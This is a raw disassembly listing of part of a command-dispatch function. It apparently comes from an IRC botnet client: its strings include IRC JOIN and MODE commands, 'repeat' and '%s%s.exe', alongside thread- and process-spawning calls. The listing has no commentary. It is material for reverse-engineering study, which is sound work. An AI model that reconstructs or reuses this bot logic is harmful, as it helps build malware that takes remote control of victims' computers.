lea eax, [eax+esi+2]
push eax
call sub_417980
mov esi, eax
lea eax, [ebp+var_2DC]
push esi
push offset dword_436930
push eax
call sub_4173AC
add esp, 20h
cmp esi, ebx
jz loc_415956
push edi
call sub_41791F
test eax, eax
pop ecx
jle loc_415956
push edi
call sub_41791F
cmp eax, 5DCh
pop ecx
jge loc_415956
push ebx
lea eax, [ebp+var_2DC]
push ebx
push eax
push [ebp+arg_18]
push edi
call sub_41791F
imul eax, 234h
pop ecx
push dword_446E1C[eax]
call sub_40DC10
push edi
call sub_41791F
imul eax, 234h
add esp, 18h
cmp byte ptr dword_446C10[eax], 73h
jnz loc_415956
push esi
push edi
call sub_41791F
imul eax, 234h
pop ecx
add eax, offset byte_446E28
push eax
push [ebp+arg_18]
push offset aSSS_1 ; "[%s] * %s %s"
loc_412C3A: ; CODE XREF: sub_40F6F1+3643�j
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DC10
jmp loc_415953
; ---------------------------------------------------------------------------
loc_412C64: ; CODE XREF: sub_40F6F1+2844�j
; sub_40F6F1+285B�j
push edi
call sub_41791F
imul eax, 234h
pop ecx
cmp byte_446E28[eax], bl
jz loc_415956
cmp [ebp+var_C], ebx
jz loc_415956
push edi
call sub_417AF0
push [ebp+arg_8]
mov esi, eax
call sub_417AF0
push [ebp+arg_18]
add esi, eax
call sub_417AF0
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_417980
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_415956
push edi
call sub_41791F
test eax, eax
pop ecx
jle loc_415956
push edi
call sub_41791F
cmp eax, 5DCh
pop ecx
jge loc_415956
push ebx
push ebx
push esi
push [ebp+arg_18]
push edi
call sub_41791F
imul eax, 234h
pop ecx
push dword_446E1C[eax]
call sub_40DC10
push edi
call sub_41791F
imul eax, 234h
add esp, 18h
cmp byte ptr dword_446C10[eax], 73h
jnz loc_415956
push esi
push edi
call sub_41791F
imul eax, 234h
pop ecx
add eax, offset byte_446E28
push eax
push [ebp+arg_18]
push offset aSSS_0 ; "[%s] <%s> %s"
jmp loc_412C3A
; ---------------------------------------------------------------------------
loc_412D39: ; CODE XREF: sub_40F6F1+2816�j
; sub_40F6F1+282D�j
push edi
call dword_4413F8 ; inet_addr
push [ebp+arg_18]
mov [ebp+var_474], eax
call sub_41791F
push [ebp+arg_0]
mov [ebp+var_480], eax
call sub_41791F
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_47C], eax
lea eax, [ebp+var_500]
mov [ebp+var_504], esi
push eax
call sub_4182F0
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_46C], edi
push [ebp+var_47C]
mov [ebp+var_468], eax
push [ebp+var_480]
push [ebp+var_474]
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_2DC]
push offset unk_4368C4
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_416E58
add esp, 20h
mov [ebp+var_478], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_504]
push ebx
push eax
push offset dword_416410
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_478]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_412E1B
loc_412E05: ; CODE XREF: sub_40F6F1+3728�j
cmp [ebp+var_464], ebx
jnz loc_412F2C
push 32h
nop
call near ptr 7C802442h
jmp short loc_412E05
; ---------------------------------------------------------------------------
loc_412E1B: ; CODE XREF: sub_40F6F1+3712�j
nop
call near ptr 7C910331h
push eax
push offset unk_436878
jmp loc_412F1D
; ---------------------------------------------------------------------------
loc_412E2C: ; CODE XREF: sub_40F6F1+27E8�j
; sub_40F6F1+27FF�j
push edi
call sub_41791F
push 7Fh
mov [ebp+var_314], eax
push [ebp+arg_18]
lea eax, [ebp+var_418]
push eax
call sub_4182F0
push [ebp+arg_0]
call sub_41791F
push [ebp+var_8C]
mov esi, [ebp+arg_4]
mov [ebp+var_318], eax
lea eax, [ebp+var_398]
push 80h
push eax
mov [ebp+var_420], esi
call sub_41792A
mov eax, [ebp+var_8]
add esp, 20h
mov edi, [ebp+var_4]
mov [ebp+var_304], eax
push [ebp+var_318]
lea eax, [ebp+var_418]
mov [ebp+var_308], edi
push eax
push [ebp+var_314]
push esi
call sub_40AFAB
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_43682C
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 10h
push eax
call sub_416E58
add esp, 24h
mov [ebp+var_310], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_420]
push ebx
push eax
push offset sub_407B45
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_310]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_412F11
loc_412EFF: ; CODE XREF: sub_40F6F1+381E�j
cmp [ebp+var_300], ebx
jnz short loc_412F2C
push 32h
nop
call near ptr 7C802442h
jmp short loc_412EFF
; ---------------------------------------------------------------------------
loc_412F11: ; CODE XREF: sub_40F6F1+380C�j
nop
call near ptr 7C910331h
push eax
push offset unk_4367D8
loc_412F1D: ; CODE XREF: sub_40F6F1+3736�j
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 0Ch
loc_412F2C: ; CODE XREF: sub_40F6F1+371A�j
; sub_40F6F1+3814�j
cmp [ebp+var_8], ebx
jnz loc_4157D0
push ebx
push edi
jmp loc_4127E0
; ---------------------------------------------------------------------------
loc_412F3C: ; CODE XREF: sub_40F6F1+27BA�j
; sub_40F6F1+27D1�j
push 0FFh
lea eax, [ebp+var_780]
push edi
push eax
call sub_4182F0
loc_412F4E: ; DATA XREF: ___:off_42D544�o
push 0FFh
lea eax, [ebp+var_680]
push [ebp+arg_18]
push eax
call sub_4182F0
push [ebp+arg_0]
mov [ebp+var_57C], ebx
call sub_41791F
mov [ebp+var_578], eax
mov eax, [ebp+esi+var_84]
add esp, 1Ch
cmp eax, ebx
jz short loc_412F98
push 10h
push ebx
push eax
call sub_417FB5
add esp, 0Ch
mov [ebp+var_570], eax
jmp short loc_412F9E
; ---------------------------------------------------------------------------
loc_412F98: ; CODE XREF: sub_40F6F1+3891�j
mov [ebp+var_570], ebx
loc_412F9E: ; CODE XREF: sub_40F6F1+38A5�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_412FB5
push esi
call sub_41791F
pop ecx
mov [ebp+var_574], eax
jmp short loc_412FBB
; ---------------------------------------------------------------------------
loc_412FB5: ; CODE XREF: sub_40F6F1+38B3�j
mov [ebp+var_574], ebx
loc_412FBB: ; CODE XREF: sub_40F6F1+38C2�j
movzx eax, [ebp+var_9C3]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_56C], eax
lea eax, [ebp+var_800]
mov [ebp+var_804], esi
push eax
call sub_4182F0
mov eax, [ebp+var_4]
push [ebp+arg_18]
mov [ebp+var_564], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
push edi
lea eax, [ebp+var_2DC]
push offset unk_43679C
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_2DC]
push 16h
push eax
call sub_416E58
add esp, 28h
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_804]
push ebx
push eax
push offset sub_40D091
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_413069
loc_413053: ; CODE XREF: sub_40F6F1+3976�j
cmp [ebp+var_560], ebx
jnz loc_4127D3
push 32h
nop
call near ptr 7C802442h
jmp short loc_413053
; ---------------------------------------------------------------------------
loc_413069: ; CODE XREF: sub_40F6F1+3960�j
nop
call near ptr 7C910331h
push eax
push offset unk_43674C
jmp loc_4127C4
; ---------------------------------------------------------------------------
loc_41307A: ; CODE XREF: sub_40F6F1+278C�j
; sub_40F6F1+27A3�j
push 7Fh
lea eax, [ebp+var_76C]
pop esi
push esi
push edi
push eax
call sub_4182F0
push esi
lea eax, [ebp+var_6EC]
push [ebp+arg_18]
push eax
call sub_4182F0
push esi
lea eax, [ebp+var_66C]
push [ebp+arg_0]
push eax
call sub_4182F0
push esi
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_4182F0
mov eax, [ebp+var_4]
push [ebp+arg_0]
mov esi, [ebp+arg_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push edi
push offset dword_436710
push eax
mov [ebp+var_770], esi
call sub_4173AC
add esp, 44h
lea eax, [ebp+var_2DC]
push ebx
push 0Bh
push eax
call sub_416E58
add esp, 0Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_770]
push ebx
push eax
push offset sub_4019D1
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_413151
loc_41313B: ; CODE XREF: sub_40F6F1+3A5E�j
cmp [ebp+var_560], ebx
jnz loc_4127D3
push 32h
nop
call near ptr 7C802442h
jmp short loc_41313B
; ---------------------------------------------------------------------------
loc_413151: ; CODE XREF: sub_40F6F1+3A48�j
nop
call near ptr 7C910331h
push eax
push offset dword_4366C8
jmp loc_4127C4
; ---------------------------------------------------------------------------
loc_413162: ; CODE XREF: sub_40F6F1+2747�j
; sub_40F6F1+275E�j ...
push 7Fh
lea eax, [ebp+var_7E8]
pop esi
push esi
push edi
push eax
call sub_4182F0
push esi
lea eax, [ebp+var_768]
push [ebp+arg_18]
push eax
call sub_4182F0
push esi
lea eax, [ebp+var_6E8]
push [ebp+arg_0]
push eax
call sub_4182F0
push esi
lea eax, [ebp+var_668]
push [ebp+var_8C]
push eax
call sub_4182F0
push 20h
lea eax, [ebp+var_5E8]
push [ebp+arg_8]
push eax
call sub_4182F0
mov eax, [ebp+var_4]
push [ebp+arg_0]
mov esi, [ebp+arg_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push edi
push offset unk_436688
push eax
mov [ebp+var_7F0], esi
call sub_4173AC
add esp, 50h
lea eax, [ebp+var_2DC]
push ebx
push 0Ah
push eax
call sub_416E58
add esp, 0Ch
mov [ebp+var_7EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_7F0]
push ebx
push eax
push offset sub_401000
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_7EC]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_41324A
loc_413234: ; CODE XREF: sub_40F6F1+3B57�j
cmp [ebp+var_560], ebx
jnz loc_4127D3
push 32h
nop
call near ptr 7C802442h
jmp short loc_413234
; ---------------------------------------------------------------------------
loc_41324A: ; CODE XREF: sub_40F6F1+3B41�j
nop
call near ptr 7C910331h
push eax
push offset unk_436640
jmp loc_4127C4
; ---------------------------------------------------------------------------
loc_41325B: ; CODE XREF: sub_40F6F1+2719�j
; sub_40F6F1+2730�j
push 7Fh
lea eax, [ebp+var_458]
push edi
push eax
call sub_4182F0
push [ebp+arg_18]
call sub_41791F
push 3Fh
mov [ebp+var_308], eax
push [ebp+arg_0]
lea eax, [ebp+var_3D8]
push eax
call sub_4182F0
mov esi, [ebp+esi+var_84]
add esp, 1Ch
cmp esi, ebx
jz short loc_4132A9
push 3Fh
lea eax, [ebp+var_398]
push esi
push eax
call sub_4182F0
add esp, 0Ch
loc_4132A9: ; CODE XREF: sub_40F6F1+3BA4�j
lea eax, [ebp+var_3D8]
mov [ebp+var_304], 1
push eax
lea eax, [ebp+var_458]
push [ebp+var_308]
push eax
lea eax, [ebp+var_2DC]
push offset unk_436600
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 18h
push eax
call sub_416E58
add esp, 20h
mov [ebp+var_300], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_45C]
push ebx
push eax
push offset sub_40F326
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_300]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_413335
loc_41331F: ; CODE XREF: sub_40F6F1+3C42�j
cmp [ebp+var_2FC], ebx
jnz loc_41455C
push 32h
nop
call near ptr 7C802442h
jmp short loc_41331F
; ---------------------------------------------------------------------------
loc_413335: ; CODE XREF: sub_40F6F1+3C2C�j
nop
call near ptr 7C910331h
push eax
push offset unk_4365B8
jmp loc_4121DF
; ---------------------------------------------------------------------------
loc_413346: ; CODE XREF: sub_40F6F1+26D9�j
; sub_40F6F1+26F0�j
push [ebp+arg_18]
call sub_41791F
cmp eax, ebx
pop ecx
mov [ebp+var_570], eax
jle loc_413437
mov esi, 80h
push edi
lea eax, [ebp+var_6F8]
push esi
push eax
call sub_41792A
xor eax, eax
cmp [ebp+var_9B6], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_56C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_6FC], eax
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_41792A
mov eax, [ebp+var_4]
push [ebp+arg_18]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
push edi
push offset unk_43657C
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41792A
push ebx
lea eax, [ebp+var_2DC]
push 0Dh
push eax
call sub_416E58
add esp, 38h
mov [ebp+var_578], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6FC]
push ebx
push eax
push offset sub_401447
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_578]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_413426
loc_413410: ; CODE XREF: sub_40F6F1+3D33�j
cmp [ebp+var_560], ebx
jnz loc_412267
push 32h
nop
call near ptr 7C802442h
jmp short loc_413410
; ---------------------------------------------------------------------------
loc_413426: ; CODE XREF: sub_40F6F1+3D1D�j
nop
call near ptr 7C910331h
push eax
push offset unk_436534
jmp loc_412258
; ---------------------------------------------------------------------------
loc_413437: ; CODE XREF: sub_40F6F1+3C66�j
push offset unk_4364EC
jmp loc_412573
; ---------------------------------------------------------------------------
loc_413441: ; CODE XREF: sub_40F6F1+26AB�j
; sub_40F6F1+26C2�j
push [ebp+arg_18]
push edi
nop
call near ptr 7C835E8Fh
test eax, eax
jz short loc_413471
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push edi
push offset unk_4364B8
push 200h
push eax
call sub_41792A
loc_413469: ; CODE XREF: sub_40F6F1+4598�j
add esp, 14h
jmp loc_412267
; ---------------------------------------------------------------------------
loc_413471: ; CODE XREF: sub_40F6F1+3D5C�j
push offset dword_43649C
call sub_40A9AA
push eax
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41792A
add esp, 10h
jmp loc_412267
; ---------------------------------------------------------------------------
loc_413495: ; CODE XREF: sub_40F6F1+267D�j
; sub_40F6F1+2694�j
push edi
lea eax, [ebp+var_774]
push 104h
push eax
call sub_41792A
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_4134CF
push [ebp+arg_18]
push [ebp+var_C]
call sub_417980
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4134CF
push eax
lea eax, [ebp+var_670]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_4134CF: ; CODE XREF: sub_40F6F1+3DBC�j
; sub_40F6F1+3DCD�j
push [ebp+var_8C]
lea eax, [ebp+var_7F4]
push 80h
push eax
call sub_41792A
mov eax, [ebp+arg_4]
mov [ebp+var_7F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_670]
push eax
lea eax, [ebp+var_774]
push eax
push offset unk_43645C
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41792A
push ebx
lea eax, [ebp+var_2DC]
push 1Ch
push eax
call sub_416E58
add esp, 2Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_7F8]
push ebx
push eax
push offset sub_408D42
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_413582
loc_41356C: ; CODE XREF: sub_40F6F1+3E8F�j
cmp [ebp+var_560], ebx
jnz loc_4157D0
push 32h
nop
call near ptr 7C802442h
jmp short loc_41356C
; ---------------------------------------------------------------------------
loc_413582: ; CODE XREF: sub_40F6F1+3E79�j
nop
call near ptr 7C910331h
push eax
push offset unk_436410
jmp loc_4157C1
; ---------------------------------------------------------------------------
loc_413593: ; CODE XREF: sub_40F6F1+264F�j
; sub_40F6F1+2666�j
push 44h
lea eax, [ebp+var_4A0]
pop esi
push esi
push ebx
push eax
call sub_417430
push 1
mov [ebp+var_4A0], esi
pop esi
mov word ptr [ebp+var_470], bx
push edi
mov [ebp+var_474], esi
call sub_41791F
add esp, 10h
cmp eax, esi
jnz short loc_4135D0
mov word ptr [ebp+var_470], 5
loc_4135D0: ; CODE XREF: sub_40F6F1+3ED4�j
cmp [ebp+var_C], ebx
jz loc_41455C
push [ebp+arg_18]
push [ebp+var_C]
call sub_417980
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_41455C
lea eax, [ebp+var_2EC]
push eax
lea eax, [ebp+var_4A0]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
nop
call near ptr 7C802367h
test eax, eax
jnz short loc_41361B
push offset unk_4363DC
jmp loc_41454E
; ---------------------------------------------------------------------------
loc_41361B: ; CODE XREF: sub_40F6F1+3F1E�j
push edi
push offset dword_4363B4
jmp loc_4121DF
; ---------------------------------------------------------------------------
loc_413626: ; CODE XREF: sub_40F6F1+2621�j
; sub_40F6F1+2638�j
push [ebp+arg_18]
push offset aArra ; "arra"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41379D
lea eax, [ebp+var_3FC]
push eax
push 104h
nop
call near ptr 7C835DCAh
push 0FFh
lea eax, [ebp+var_780]
push edi
push eax
call sub_4182F0
lea eax, [ebp+var_2F8]
push eax
push [ebp+arg_4]
call sub_415F85
push eax
lea eax, [ebp+var_3FC]
push eax
lea eax, [ebp+var_680]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_4173AC
mov eax, [ebp+esi+var_88]
add esp, 24h
cmp eax, ebx
mov [ebp+var_57C], 1
mov [ebp+var_578], ebx
jz short loc_4136BB
push 10h
push ebx
push eax
call sub_417FB5
add esp, 0Ch
mov [ebp+var_570], eax
jmp short loc_4136C1
; ---------------------------------------------------------------------------
loc_4136BB: ; CODE XREF: sub_40F6F1+3FB4�j
mov [ebp+var_570], ebx
loc_4136C1: ; CODE XREF: sub_40F6F1+3FC8�j
mov esi, [ebp+esi+var_84]
cmp esi, ebx
jz short loc_4136DB
push esi
call sub_41791F
pop ecx
mov [ebp+var_574], eax
jmp short loc_4136E1
; ---------------------------------------------------------------------------
loc_4136DB: ; CODE XREF: sub_40F6F1+3FD9�j
mov [ebp+var_574], ebx
loc_4136E1: ; CODE XREF: sub_40F6F1+3FE8�j
movzx eax, [ebp+var_9C3]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_56C], eax
lea eax, [ebp+var_800]
mov [ebp+var_804], esi
push eax
call sub_4182F0
mov eax, [ebp+var_4]
push edi
mov [ebp+var_564], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
lea eax, [ebp+var_2DC]
push offset unk_43636C
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_2DC]
push 17h
push eax
call sub_416E58
add esp, 24h
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_804]
push ebx
push eax
push offset sub_40D091
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_41378C
loc_413776: ; CODE XREF: sub_40F6F1+4099�j
cmp [ebp+var_560], ebx
jnz loc_41455C
push 32h
nop
call near ptr 7C802442h
jmp short loc_413776
; ---------------------------------------------------------------------------
loc_41378C: ; CODE XREF: sub_40F6F1+4083�j
nop
call near ptr 7C910331h
push eax
push offset unk_436320
jmp loc_4121DF
; ---------------------------------------------------------------------------
loc_41379D: ; CODE XREF: sub_40F6F1+3F46�j
push offset unk_4362CC
jmp loc_41454E
; ---------------------------------------------------------------------------
loc_4137A7: ; CODE XREF: sub_40F6F1+25F3�j
; sub_40F6F1+260A�j
push [ebp+var_90]
push offset dword_438134
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_40FAB8
cmp [ebp+var_C], ebx
jz loc_40FAB8
push [ebp+arg_18]
push [ebp+var_C]
call sub_417980
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_4362BC
push eax
call sub_4173AC
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_4182F0
push edi
call sub_41791F
add esp, 30h
test eax, eax
jle short loc_41382E
push edi
call sub_41791F
imul eax, 3E8h
pop ecx
push eax
nop
call near ptr 7C802442h
loc_41382E: ; CODE XREF: sub_40F6F1+4127�j
push offset dword_436298
call sub_40C4F7
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_40FABB
; ---------------------------------------------------------------------------
loc_413842: ; CODE XREF: sub_40F6F1+25C5�j
; sub_40F6F1+25DC�j
push [ebp+var_90]
push offset dword_438134
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_40FAB8
cmp [ebp+var_C], ebx
jz loc_415956
push [ebp+arg_18]
push [ebp+var_C]
call sub_417980
mov esi, eax
mov eax, [ebp+arg_18]
inc eax
push offset aRepeat ; "repeat"
push eax
call sub_4177D0
add esp, 10h
test eax, eax
push esi
jz short loc_4138FE
push [ebp+var_8C]
lea eax, [ebp+var_2DC]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_4362BC
push eax
call sub_4173AC
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_4182F0
push esi
lea eax, [ebp+var_2DC]
push offset dword_436268
push eax
call sub_4173AC
lea eax, [ebp+var_2DC]
push eax
call sub_40C4F7
push edi
call sub_41791F
add esp, 38h
test eax, eax
jle loc_415956
push edi
call sub_41791F
add eax, [ebp+arg_24]
pop ecx
jmp loc_40FABB
; ---------------------------------------------------------------------------
loc_4138FE: ; CODE XREF: sub_40F6F1+4196�j
push offset dword_436224
jmp loc_4121DF
; ---------------------------------------------------------------------------
loc_413908: ; CODE XREF: sub_40F6F1+2597�j
; sub_40F6F1+25AE�j
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push offset dword_43621C
push eax
call sub_4173AC
push edi
call sub_41791F
add esp, 10h
loc_413925: ; CODE XREF: sub_40F6F1+429E�j
test eax, eax
jle loc_415956
push edi
call sub_41791F
cmp eax, 5DCh
pop ecx
jge loc_415956
loc_41393F: ; CODE XREF: sub_40F6F1+4F51�j
lea eax, [ebp+var_2DC]
push eax
push offset dword_425A78
push edi
call sub_41791F
imul eax, 234h
pop ecx
push dword_446E1C[eax]
call sub_40DBCA
loc_413963: ; CODE XREF: sub_40F6F1+5E7C�j
add esp, 0Ch
jmp loc_415956
; ---------------------------------------------------------------------------
loc_41396B: ; CODE XREF: sub_40F6F1+2569�j
; sub_40F6F1+2580�j
push [ebp+esi+var_88]
lea eax, [ebp+var_2DC]
push [ebp+arg_18]
push offset dword_436210
push eax
call sub_4173AC
push edi
call sub_41791F
add esp, 14h
jmp short loc_413925
; ---------------------------------------------------------------------------
loc_413991: ; CODE XREF: sub_40F6F1+253B�j
; sub_40F6F1+2552�j
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push offset dword_436208
push eax
call sub_4173AC
push edi
call sub_41791F
add esp, 10h
test eax, eax
jle loc_415956
push edi
call sub_41791F
cmp eax, 5DCh
pop ecx
jge loc_415956
lea eax, [ebp+var_2DC]
push eax
push offset dword_425A78
push edi
call sub_41791F
imul eax, 234h
pop ecx
push dword_446E1C[eax]
call sub_40DBCA
push [ebp+arg_18]
push edi
push offset dword_4361DC
loc_4139F5: ; CODE XREF: sub_40F6F1+438E�j
; sub_40F6F1+43F9�j ...
call sub_40C56B
loc_4139FA: ; CODE XREF: sub_40F6F1+5B64�j
add esp, 18h
jmp loc_415956
; ---------------------------------------------------------------------------
loc_413A02: ; CODE XREF: sub_40F6F1+250D�j
; sub_40F6F1+2524�j
cmp [ebp+var_C], ebx
jz loc_415956
push [ebp+arg_18]
push [ebp+var_C]
call sub_417980
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_413A33
push esi
lea eax, [ebp+var_2DC]
push offset dword_4361D4
push eax
call sub_4173AC
add esp, 0Ch
loc_413A33: ; CODE XREF: sub_40F6F1+432B�j
push edi
call sub_41791F
test eax, eax
pop ecx
jle loc_415956
push edi
call sub_41791F
cmp eax, 5DCh
pop ecx
jge loc_415956
lea eax, [ebp+var_2DC]
push eax
push offset dword_425A78
push edi
call sub_41791F
imul eax, 234h
pop ecx
push dword_446E1C[eax]
call sub_40DBCA
push esi
push edi
push offset dword_4361A8
jmp loc_4139F5
; ---------------------------------------------------------------------------
loc_413A84: ; CODE XREF: sub_40F6F1+24DF�j
; sub_40F6F1+24F6�j
cmp [ebp+var_C], ebx
jz loc_415956
push [ebp+arg_18]
push [ebp+var_C]
call sub_417980
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_415956
push edi
call sub_41791F
test eax, eax
pop ecx
jle loc_415956
push edi
call sub_41791F
cmp eax, 5DCh
pop ecx
jge loc_415956
push esi
push offset dword_425A78
push edi
call sub_41791F
imul eax, 234h
pop ecx
push dword_446E1C[eax]
call sub_40DBCA
push esi
push edi
push offset dword_43617C
jmp loc_4139F5
; ---------------------------------------------------------------------------
loc_413AEF: ; CODE XREF: sub_40F6F1+24B1�j
; sub_40F6F1+24C8�j
cmp [ebp+var_C], ebx
jz loc_415956
push edi
push [ebp+var_C]
call sub_417980
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_415956
push esi
push offset aModeS ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_40DBCA
push esi
push offset dword_436144
loc_413B21: ; CODE XREF: sub_40F6F1+50F6�j
; sub_40F6F1+510F�j ...
call sub_40C56B
loc_413B26: ; CODE XREF: sub_40F6F1+449E�j
add esp, 14h
jmp loc_415956
; ---------------------------------------------------------------------------
loc_413B2E: ; CODE XREF: sub_40F6F1+2483�j
; sub_40F6F1+249A�j
push [ebp+var_90]
push offset dword_438134
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_40FAB8
push [ebp+arg_18]
push offset dword_436138
push [ebp+arg_4]
call sub_40DBCA
push edi
call sub_41791F
imul eax, 3E8h
add esp, 10h
push eax
nop
call near ptr 7C802442h
push [ebp+esi+var_88]
push [ebp+arg_18]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40DBCA
push offset dword_436114
call sub_40C4F7
jmp short loc_413B26
; ---------------------------------------------------------------------------
loc_413B91: ; CODE XREF: sub_40F6F1+2455�j
; sub_40F6F1+246C�j
cmp [ebp+var_C], ebx
jz loc_415956
push edi
call sub_417AF0
push [ebp+arg_8]
mov esi, eax
call sub_417AF0
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_417980
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_415956
push esi
lea eax, [ebp+var_2DC]
push offset dword_436930
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push ebx
push eax
push edi
push [ebp+arg_4]
call sub_40DC10
push esi
push edi
push offset dword_4360E8
call sub_40C56B
add esp, 2Ch
jmp loc_415956
; ---------------------------------------------------------------------------
loc_413BFF: ; CODE XREF: sub_40F6F1+2427�j
; sub_40F6F1+243E�j
cmp [ebp+var_C], ebx
jz loc_415956
push edi
call sub_417AF0
push [ebp+arg_8]
mov esi, eax
call sub_417AF0
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_417980
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_415956
push ebx
push ebx
push esi
push edi
push [ebp+arg_4]
call sub_40DC10
push esi
push edi
push offset dword_4360BC
call sub_40C56B
jmp loc_41283E
; ---------------------------------------------------------------------------
loc_413C52: ; CODE XREF: sub_40F6F1+23F9�j
; sub_40F6F1+2410�j
cmp [ebp+var_C], ebx
jz loc_40FAB8
push [ebp+arg_18]
push [ebp+var_C]
call sub_417980
pop ecx
cmp eax, ebx
pop ecx
jz loc_40FAB8
push eax
push edi
call sub_40C3FF
push edi
lea eax, [ebp+var_2DC]
push offset dword_436090
push eax
call sub_4173AC
jmp loc_413469
; ---------------------------------------------------------------------------
loc_413C8E: ; CODE XREF: sub_40F6F1+23B9�j
; sub_40F6F1+23D0�j
push edi
push [ebp+arg_1C]
call sub_417980
pop ecx
test eax, eax
pop ecx
jz loc_415956
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_413D2B
push esi
push [ebp+var_C]
call sub_417980
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_413D13
